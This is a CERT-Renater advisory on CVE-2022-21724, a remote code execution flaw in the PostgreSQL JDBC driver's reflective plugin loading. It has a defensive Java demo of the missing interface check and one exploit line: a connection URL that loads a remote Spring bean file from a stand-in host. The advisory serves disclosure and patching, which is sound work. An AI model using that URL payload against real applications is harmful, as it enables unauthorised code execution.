
=====================================================================

                             CERT-Renater

                   Note d'Information No. 2021/VULN058
_____________________________________________________________________

DATE                : 03/02/2022

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Any system running an application that uses the
                     PostgreSQL JDBC driver (org.postgresql:postgresql,
                     Java) in versions 9.4.1208 up to and including
                     42.2.24, or 42.3.0 up to and including 42.3.1.

=====================================================================
https://github.com/advisories/GHSA-v7wg-cpwc-24m4
https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4
https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813
_____________________________________________________________________


Remote code execution vulnerability using plugin features
Severity: High

Vulnerability details

Package              org.postgresql:postgresql (maven)
Affected versions    >= 9.4.1208, < 42.2.25
                      >= 42.3.0, < 42.3.2
Patched versions     42.2.25
                      42.3.2


Description

Impact
pgjdbc instantiates plugin objects by reflection from class names
supplied in the authenticationPluginClassName, sslhostnameverifier,
socketFactory, sslfactory and sslpasswordcallback connection properties
(the matching *Arg properties supply a String constructor argument).

However, the driver did not verify that the named class implements the
expected interface before instantiating it. Anyone who can influence
the JDBC URL or connection properties can therefore have the driver
instantiate any class on the application classpath that has a public
String constructor, and any side effects of that constructor run inside
the application. This is why the CVSS vector below carries PR:L and
AC:H: exploitation needs some control over the connection properties
plus a suitable "gadget" class on the classpath.

Here is an example attack using an out-of-the-box class from the Spring
Framework. ClassPathXmlApplicationContext(String) loads the bean
definitions at the given location, including a remote URL, and
instantiates the beans it declares, so an attacker-controlled XML file
yields code execution in the application:

    import java.sql.DriverManager;

    // socketFactory names the gadget class; socketFactoryArg becomes the
    // String passed to its constructor (here, the location of the
    // attacker's bean definition file).
    DriverManager.getConnection(
        "jdbc:postgresql://node1/test"
        + "?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext"
        + "&socketFactoryArg=http://target/exp.xml");

The first affected version is REL9.4.1208, which introduced the
socketFactory connection property.
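The following self-contained Java program is an added illustration of the
flaw and of the check that closes it; it is not pgjdbc's own code. The
class and method names (PluginLoaderDemo, Gadget, DemoSocketFactory,
instantiateUnchecked, instantiateChecked) are invented for the example.
The unchecked loader reproduces the vulnerable pattern: resolve the class
named in a property, find its String constructor, and call it, so a
gadget's constructor runs. The checked loader verifies that the class is
assignable to the expected plugin type (here javax.net.SocketFactory)
before any constructor is looked up or executed, which is the property
the advisory says the driver lacked.

```java
import java.lang.reflect.Constructor;
import java.net.InetAddress;
import java.net.Socket;
import javax.net.SocketFactory;

/**
 * Added example (not pgjdbc code): plugin instantiation from a
 * property-supplied class name, with and without an interface check.
 */
public class PluginLoaderDemo {

    /** Stand-in for a gadget such as ClassPathXmlApplicationContext: any
     *  classpath class with a public String constructor that does work in
     *  that constructor. This one only records that it ran. */
    public static class Gadget {
        static String lastArg;
        public Gadget(String arg) { lastArg = arg; }
    }

    /** A legitimate plugin: a real SocketFactory with a String constructor. */
    public static class DemoSocketFactory extends SocketFactory {
        public DemoSocketFactory(String arg) { }
        @Override public Socket createSocket(String h, int p) {
            throw new UnsupportedOperationException("demo only"); }
        @Override public Socket createSocket(String h, int p, InetAddress l, int lp) {
            throw new UnsupportedOperationException("demo only"); }
        @Override public Socket createSocket(InetAddress h, int p) {
            throw new UnsupportedOperationException("demo only"); }
        @Override public Socket createSocket(InetAddress h, int p, InetAddress l, int lp) {
            throw new UnsupportedOperationException("demo only"); }
    }

    /** Vulnerable pattern: trusts the name and instantiates whatever it resolves to. */
    static Object instantiateUnchecked(String className, String arg) throws Exception {
        Class<?> cls = Class.forName(className);
        Constructor<?> ctor = cls.getConstructor(String.class);
        return ctor.newInstance(arg);   // gadget constructor executes here
    }

    /** Hardened pattern: reject any class that is not assignable to the
     *  expected plugin type before touching a constructor. */
    static <T> T instantiateChecked(Class<T> expected, String className, String arg)
            throws Exception {
        Class<?> cls = Class.forName(className);
        if (!expected.isAssignableFrom(cls)) {
            throw new IllegalArgumentException(
                className + " does not implement " + expected.getName());
        }
        Constructor<?> ctor = cls.getConstructor(String.class);
        return expected.cast(ctor.newInstance(arg));
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: these stand in for attacker-controlled
        // socketFactory / socketFactoryArg connection properties.
        String gadgetName = Gadget.class.getName();
        String goodName = DemoSocketFactory.class.getName();
        String payload = "http://target/exp.xml";

        // 1. Unchecked: the gadget is instantiated and its constructor runs.
        instantiateUnchecked(gadgetName, payload);
        System.out.println("unchecked: gadget constructor ran with arg " + Gadget.lastArg);

        // 2. Checked: the same name is rejected before any constructor executes.
        Gadget.lastArg = null;
        try {
            instantiateChecked(SocketFactory.class, gadgetName, payload);
        } catch (IllegalArgumentException e) {
            System.out.println("checked: rejected (" + e.getMessage()
                + "); constructor ran: " + (Gadget.lastArg != null));
        }

        // 3. Checked: a genuine SocketFactory implementation is still accepted.
        SocketFactory sf = instantiateChecked(SocketFactory.class, goodName, "");
        System.out.println("checked: accepted " + sf.getClass().getSimpleName());
    }
}
```

Compile and run with `javac PluginLoaderDemo.java && java PluginLoaderDemo`.
The important ordering is that the assignability test happens before
getConstructor/newInstance: checking the type of the object after it has
been created would be too late, since the gadget's constructor is the
payload. When auditing a patched driver, confirm the same ordering for
every one of the five properties listed above, not only socketFactory.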


References
GHSA-v7wg-cpwc-24m4
pgjdbc/pgjdbc@f4d0ed6


CVE ID
CVE-2022-21724

CWEs
CWE-74

CVSS Score
8.5 High
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================

